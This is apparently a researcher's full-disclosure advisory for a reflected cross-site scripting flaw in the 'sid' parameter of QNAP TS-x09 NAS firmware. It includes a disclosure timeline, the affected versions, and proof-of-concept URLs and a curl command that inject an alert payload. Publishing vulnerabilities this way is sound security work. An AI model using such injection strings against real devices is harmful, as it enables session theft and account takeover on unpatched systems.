On the 7th of July 2015 I discovered a reflected cross-site scripting (XSS) vulnerability in QNAP TS-x09 Network Attached Storage devices. Full disclosure was undertaken with the vendor and a CVE-ID has been requested from Mitre. CVE-ID: requested via PGP email 7th July 2015 Author: Mark Cross Twitter: @xerubus WWW: www.mogozobo.com Reference: http://www.mogozobo.com/?p=2574 ==================== Summary ==================== A reflected Cross-Site scripting vulnerability was found in QNAP TS-109/209/409/409U Turbo NAS devices, including Standard, II, PRO and PRO-II models running <= Version 3.3.3 Build 1003T. A vulnerability in the sid variable in cgi-bin/user_index.cgi and cgi-bin/index.cgi allows a remote unauthenticated attacker to inject arbitrary JavaScript which is executed server-side by escaping from the quotation marks. ==================== Disclosure Timeline ==================== 07 July 2015 – Requested PGP from vendor via website for secure communications. – Requested CVE identifier from MITRE via PGP. 08 July 2015 – Received email from vendor with security contact and PGP key. – Received email from Mitre requesting further information. – Emailed vendor full vulnerability details via PGP email – Emailed further details to Mitre as requested. 10 July 2015 – Emailed security contact for confirmation of receipt of previous email 13 July 2015 – Requested acceptance and mutually agreeable disclosure period 21 July 2015 – Vendor advised they will not be releasing a new firmware. – Advised vendor public disclosure date will be Friday 24th July 2015 24 July 2015 – Provided MITRE will full vulnerability details – Advised MITRE that vendor will not be patching vulnerability – Re-requested CVE-IDs be released - Vulnerability published on mogozobo.com - Vulnerability publicly disclosed via Full Disclosure mailing list. ==================== Status ==================== Published ==================== Tested versions ==================== This vulnerability was tested on the following QNAP devices: – TS-109 PRO and TS-109 II Version 3.3.0 Build 0924T – TS-209 and TS-209 PRO II Version 3.3.3 Build 1003T – TS-409 and TS-409U Version 3.3.2 Build 0918T ==================== Details ==================== The QNAP NAS Management Software, embedded as firmware, is accessible via a web-based interface on all Turbo NAS devices. A vulnerability in the sid variables in cgi-bin/user_index.cgi and cgi-bin/index.cgi allows a remote unauthenticated attacker to inject arbitrary JavaScript which is executed server-side by escaping from the quotation marks. An attacker may exploit the reflected XSS vulnerability to cause a victim to execute the malicious JavaScript code within the user’s browser. The malicious code can perform, but is not limited to, stealing a victim’s session token or login credentials, log the victim’s keystrokes, or perform arbitrary actions on the victim’s behalf. ==================== Vulnerable URLs: ==================== http://target:8080/cgi-bin/user_index.cgi http://target:8080/cgi-bin/index.cgi ==================== XSS Proof-of-concept (POC) ==================== The following proof-of-concept (POC) demonstrates the injection: http://target:8080/cgi-bin/user_index.cgi?sid=%22%3balert%28%22XSS%22%29%2f%2f http://target:8080/cgi-bin/index.cgi?sid=%22%3balert%28%22XSS%22%29%2f%2f # Example $ curl -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" 'http://:8080/cgi-bin/user_index.cgi?sid=";alert("XSS")//' -s | grep XSS var sid = "";alert("XSS")//"; ==================== Vulnerability solution ==================== QNAP have advised that they will not release a new firmware to address the vulnerabilities.